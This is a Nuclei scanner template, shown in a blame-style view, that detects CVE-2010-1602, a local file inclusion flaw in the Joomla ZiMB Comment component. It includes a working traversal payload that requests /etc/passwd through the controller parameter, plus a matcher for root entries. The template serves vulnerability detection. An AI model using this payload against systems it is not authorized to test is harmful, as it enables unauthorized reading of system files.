nuclei-templates/http/cves/2010/CVE-2010-1602.yaml

43 lines
1.6 KiB
YAML
Raw Normal View History

2021-08-14 23:25:02 +00:00
id: CVE-2010-1602
info:
name: Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
2023-09-06 13:22:34 +00:00
remediation: |
Update to the latest version of Joomla! Component ZiMB Comment or apply the provided patch to fix the LFI vulnerability.
reference:
2021-08-14 23:25:02 +00:00
- https://www.exploit-db.com/exploits/12283
- https://nvd.nist.gov/vuln/detail/CVE-2010-1602
- http://packetstormsecurity.org/1004-exploits/joomlazimbcomment-lfi.txt
2023-07-11 19:49:27 +00:00
- http://www.vupen.com/english/advisories/2010/0932
Dashboard Content Enhancements (#3711) * Enhancement: cves/2010/CVE-2010-1353.yaml by mp * Enhancement: cves/2010/CVE-2010-1352.yaml by mp * Enhancement: cves/2010/CVE-2010-1345.yaml by mp * Enhancement: cves/2010/CVE-2010-1340.yaml by mp * Enhancement: cves/2010/CVE-2010-1345.yaml by mp * Enhancement: cves/2010/CVE-2010-1315.yaml by mp * Enhancement: cves/2010/CVE-2010-1314.yaml by mp * Enhancement: cves/2010/CVE-2010-1313.yaml by mp * Enhancement: cves/2010/CVE-2010-1312.yaml by mp * Enhancement: cves/2010/CVE-2010-1308.yaml by mp * Enhancement: cves/2010/CVE-2010-1307.yaml by mp * Enhancement: cves/2010/CVE-2010-1306.yaml by mp * Enhancement: cves/2010/CVE-2010-1305.yaml by mp * Enhancement: cves/2010/CVE-2010-1304.yaml by mp * Enhancement: cves/2010/CVE-2010-1302.yaml by mp * Enhancement: cves/2010/CVE-2010-1219.yaml by mp * Enhancement: cves/2010/CVE-2010-1352.yaml by mp * Enhancement: cves/2010/CVE-2010-1354.yaml by mp * Enhancement: cves/2010/CVE-2010-1461.yaml by mp * Enhancement: cves/2010/CVE-2010-1469.yaml by mp * Enhancement: cves/2010/CVE-2010-1470.yaml by mp * Enhancement: cves/2010/CVE-2010-1471.yaml by mp * Enhancement: cves/2010/CVE-2010-1472.yaml by mp * Enhancement: cves/2010/CVE-2010-1473.yaml by mp * Enhancement: cves/2010/CVE-2010-1474.yaml by mp * Enhancement: cves/2010/CVE-2010-1475.yaml by mp * Enhancement: cves/2010/CVE-2010-1476.yaml by mp * Enhancement: cves/2010/CVE-2010-1478.yaml by mp * Enhancement: cves/2010/CVE-2010-1491.yaml by mp * Enhancement: cves/2010/CVE-2010-1494.yaml by mp * Enhancement: cves/2010/CVE-2010-1495.yaml by mp * Enhancement: cves/2010/CVE-2010-1531.yaml by mp * Enhancement: cves/2010/CVE-2010-1473.yaml by mp * Enhancement: misconfiguration/proxy/metadata-alibaba.yaml by cs * Enhancement: misconfiguration/proxy/metadata-openstack.yaml by cs * Enhancement: misconfiguration/proxy/metadata-oracle.yaml by cs * Enhancement: cves/2016/CVE-2016-4975.yaml by cs * Enhancement: misconfiguration/proxy/metadata-openstack.yaml by cs * Enhancement: misconfiguration/proxy/metadata-oracle.yaml by cs * Enhancement: misconfiguration/proxy/metadata-openstack.yaml by cs * Enhancement: misconfiguration/proxy/metadata-digitalocean.yaml by cs * Enhancement: misconfiguration/proxy/metadata-alibaba.yaml by cs * Enhancement: misconfiguration/proxy/metadata-hetzner.yaml by cs * Enhancement: misconfiguration/proxy/metadata-aws.yaml by cs * Enhancement: misconfiguration/proxy/metadata-google.yaml by cs * Enhancement: misconfiguration/proxy/metadata-azure.yaml by cs * Enhancement: misconfiguration/proxy/open-proxy-localhost.yaml by cs * Enhancement: misconfiguration/proxy/open-proxy-internal.yaml by cs * Enhancement: cves/2021/CVE-2021-1497.yaml by cs * Spacing fixes and enhancement to CNVD-2019-01348.yaml * Spacing fixes, and enhancement to CNVD-2019-01348.yaml * Merge artifact * Spacing * Minor tags cleanup * Enhancement: cves/2010/CVE-2010-1532.yaml by mp * Enhancement: cves/2010/CVE-2010-1533.yaml by mp * Enhancement: cves/2010/CVE-2010-1534.yaml by mp * Enhancement: cves/2010/CVE-2010-1535.yaml by mp * Enhancement: cves/2010/CVE-2010-1540.yaml by mp * Enhancement: cves/2010/CVE-2010-1601.yaml by mp * Enhancement: cves/2010/CVE-2010-1602.yaml by mp * Enhancement: cves/2010/CVE-2010-1603.yaml by mp * Enhancement: cves/2010/CVE-2010-1607.yaml by mp * Enhancement: cves/2010/CVE-2010-1653.yaml by mp * Enhancement: cves/2010/CVE-2010-1657.yaml by mp * Enhancement: cves/2010/CVE-2010-1657.yaml by mp * Enhancement: cves/2010/CVE-2010-1658.yaml by mp * Enhancement: cves/2010/CVE-2010-1659.yaml by mp * Enhancement: cves/2010/CVE-2010-1714.yaml by mp * Enhancement: cves/2010/CVE-2010-1715.yaml by mp * Enhancement: cves/2010/CVE-2010-1532.yaml by mp * Enhancement: cves/2010/CVE-2010-1533.yaml by mp * Enhancement: cves/2010/CVE-2010-1534.yaml by mp * Enhancement: cves/2010/CVE-2010-1534.yaml by mp * Enhancement: cves/2010/CVE-2010-1535.yaml by mp * Enhancement: cves/2010/CVE-2010-1540.yaml by mp * Enhancement: cves/2010/CVE-2010-1540.yaml by mp * Enhancement: cves/2010/CVE-2010-1717.yaml by mp * Enhancement: cves/2010/CVE-2010-1718.yaml by mp * Enhancement: cves/2010/CVE-2010-1719.yaml by mp * Enhancement: cves/2010/CVE-2010-1722.yaml by mp * Enhancement: cves/2010/CVE-2010-1723.yaml by mp * Enhancement: cves/2010/CVE-2010-1858.yaml by mp * Enhancement: cves/2010/CVE-2010-1873.yaml by mp * Enhancement: cves/2010/CVE-2010-1870.yaml by mp * Enhancement: cves/2010/CVE-2010-1875.yaml by mp * Enhancement: cves/2010/CVE-2010-1878.yaml by mp * Enhancement: cves/2010/CVE-2010-1952.yaml by mp * Enhancement: cves/2010/CVE-2010-1953.yaml by mp * Enhancement: cves/2010/CVE-2010-1954.yaml by mp * Enhancement: cves/2010/CVE-2010-1955.yaml by mp * Enhancement: cves/2010/CVE-2010-1956.yaml by mp * Information Enhancements Co-authored-by: sullo <sullo@cirt.net>
2022-02-15 22:47:54 +00:00
classification:
2022-09-06 01:33:31 +00:00
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
cvss-score: 7.5
Dashboard Content Enhancements (#3711) * Enhancement: cves/2010/CVE-2010-1353.yaml by mp * Enhancement: cves/2010/CVE-2010-1352.yaml by mp * Enhancement: cves/2010/CVE-2010-1345.yaml by mp * Enhancement: cves/2010/CVE-2010-1340.yaml by mp * Enhancement: cves/2010/CVE-2010-1345.yaml by mp * Enhancement: cves/2010/CVE-2010-1315.yaml by mp * Enhancement: cves/2010/CVE-2010-1314.yaml by mp * Enhancement: cves/2010/CVE-2010-1313.yaml by mp * Enhancement: cves/2010/CVE-2010-1312.yaml by mp * Enhancement: cves/2010/CVE-2010-1308.yaml by mp * Enhancement: cves/2010/CVE-2010-1307.yaml by mp * Enhancement: cves/2010/CVE-2010-1306.yaml by mp * Enhancement: cves/2010/CVE-2010-1305.yaml by mp * Enhancement: cves/2010/CVE-2010-1304.yaml by mp * Enhancement: cves/2010/CVE-2010-1302.yaml by mp * Enhancement: cves/2010/CVE-2010-1219.yaml by mp * Enhancement: cves/2010/CVE-2010-1352.yaml by mp * Enhancement: cves/2010/CVE-2010-1354.yaml by mp * Enhancement: cves/2010/CVE-2010-1461.yaml by mp * Enhancement: cves/2010/CVE-2010-1469.yaml by mp * Enhancement: cves/2010/CVE-2010-1470.yaml by mp * Enhancement: cves/2010/CVE-2010-1471.yaml by mp * Enhancement: cves/2010/CVE-2010-1472.yaml by mp * Enhancement: cves/2010/CVE-2010-1473.yaml by mp * Enhancement: cves/2010/CVE-2010-1474.yaml by mp * Enhancement: cves/2010/CVE-2010-1475.yaml by mp * Enhancement: cves/2010/CVE-2010-1476.yaml by mp * Enhancement: cves/2010/CVE-2010-1478.yaml by mp * Enhancement: cves/2010/CVE-2010-1491.yaml by mp * Enhancement: cves/2010/CVE-2010-1494.yaml by mp * Enhancement: cves/2010/CVE-2010-1495.yaml by mp * Enhancement: cves/2010/CVE-2010-1531.yaml by mp * Enhancement: cves/2010/CVE-2010-1473.yaml by mp * Enhancement: misconfiguration/proxy/metadata-alibaba.yaml by cs * Enhancement: misconfiguration/proxy/metadata-openstack.yaml by cs * Enhancement: misconfiguration/proxy/metadata-oracle.yaml by cs * Enhancement: cves/2016/CVE-2016-4975.yaml by cs * Enhancement: misconfiguration/proxy/metadata-openstack.yaml by cs * Enhancement: misconfiguration/proxy/metadata-oracle.yaml by cs * Enhancement: misconfiguration/proxy/metadata-openstack.yaml by cs * Enhancement: misconfiguration/proxy/metadata-digitalocean.yaml by cs * Enhancement: misconfiguration/proxy/metadata-alibaba.yaml by cs * Enhancement: misconfiguration/proxy/metadata-hetzner.yaml by cs * Enhancement: misconfiguration/proxy/metadata-aws.yaml by cs * Enhancement: misconfiguration/proxy/metadata-google.yaml by cs * Enhancement: misconfiguration/proxy/metadata-azure.yaml by cs * Enhancement: misconfiguration/proxy/open-proxy-localhost.yaml by cs * Enhancement: misconfiguration/proxy/open-proxy-internal.yaml by cs * Enhancement: cves/2021/CVE-2021-1497.yaml by cs * Spacing fixes and enhancement to CNVD-2019-01348.yaml * Spacing fixes, and enhancement to CNVD-2019-01348.yaml * Merge artifact * Spacing * Minor tags cleanup * Enhancement: cves/2010/CVE-2010-1532.yaml by mp * Enhancement: cves/2010/CVE-2010-1533.yaml by mp * Enhancement: cves/2010/CVE-2010-1534.yaml by mp * Enhancement: cves/2010/CVE-2010-1535.yaml by mp * Enhancement: cves/2010/CVE-2010-1540.yaml by mp * Enhancement: cves/2010/CVE-2010-1601.yaml by mp * Enhancement: cves/2010/CVE-2010-1602.yaml by mp * Enhancement: cves/2010/CVE-2010-1603.yaml by mp * Enhancement: cves/2010/CVE-2010-1607.yaml by mp * Enhancement: cves/2010/CVE-2010-1653.yaml by mp * Enhancement: cves/2010/CVE-2010-1657.yaml by mp * Enhancement: cves/2010/CVE-2010-1657.yaml by mp * Enhancement: cves/2010/CVE-2010-1658.yaml by mp * Enhancement: cves/2010/CVE-2010-1659.yaml by mp * Enhancement: cves/2010/CVE-2010-1714.yaml by mp * Enhancement: cves/2010/CVE-2010-1715.yaml by mp * Enhancement: cves/2010/CVE-2010-1532.yaml by mp * Enhancement: cves/2010/CVE-2010-1533.yaml by mp * Enhancement: cves/2010/CVE-2010-1534.yaml by mp * Enhancement: cves/2010/CVE-2010-1534.yaml by mp * Enhancement: cves/2010/CVE-2010-1535.yaml by mp * Enhancement: cves/2010/CVE-2010-1540.yaml by mp * Enhancement: cves/2010/CVE-2010-1540.yaml by mp * Enhancement: cves/2010/CVE-2010-1717.yaml by mp * Enhancement: cves/2010/CVE-2010-1718.yaml by mp * Enhancement: cves/2010/CVE-2010-1719.yaml by mp * Enhancement: cves/2010/CVE-2010-1722.yaml by mp * Enhancement: cves/2010/CVE-2010-1723.yaml by mp * Enhancement: cves/2010/CVE-2010-1858.yaml by mp * Enhancement: cves/2010/CVE-2010-1873.yaml by mp * Enhancement: cves/2010/CVE-2010-1870.yaml by mp * Enhancement: cves/2010/CVE-2010-1875.yaml by mp * Enhancement: cves/2010/CVE-2010-1878.yaml by mp * Enhancement: cves/2010/CVE-2010-1952.yaml by mp * Enhancement: cves/2010/CVE-2010-1953.yaml by mp * Enhancement: cves/2010/CVE-2010-1954.yaml by mp * Enhancement: cves/2010/CVE-2010-1955.yaml by mp * Enhancement: cves/2010/CVE-2010-1956.yaml by mp * Information Enhancements Co-authored-by: sullo <sullo@cirt.net>
2022-02-15 22:47:54 +00:00
cve-id: CVE-2010-1602
2022-09-06 01:33:31 +00:00
cwe-id: CWE-22
2023-07-11 19:49:27 +00:00
epss-score: 0.03451
epss-percentile: 0.90462
2023-09-06 13:22:34 +00:00
cpe: cpe:2.3:a:zimbllc:com_zimbcomment:0.8.1:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: zimbllc
product: com_zimbcomment
tags: lfi,edb,packetstorm,cve,cve2010,joomla
2021-08-14 23:25:02 +00:00
http:
2021-08-14 23:25:02 +00:00
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00"
2023-07-11 19:49:27 +00:00
2021-08-14 23:25:02 +00:00
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
2023-07-11 19:49:27 +00:00
2021-08-14 23:25:02 +00:00
- type: status
status:
- 200
# digest: 490a00463044022076f3ca92a865464666f396d43e26a3a12e8f92ab47dffe76d7e086728fafdd07022014300b200ca890fb7a8aa04604cf89e4cdfcfda638d84cc66fa71780cc3e011b:922c64590222798bb761d5b6d8e72950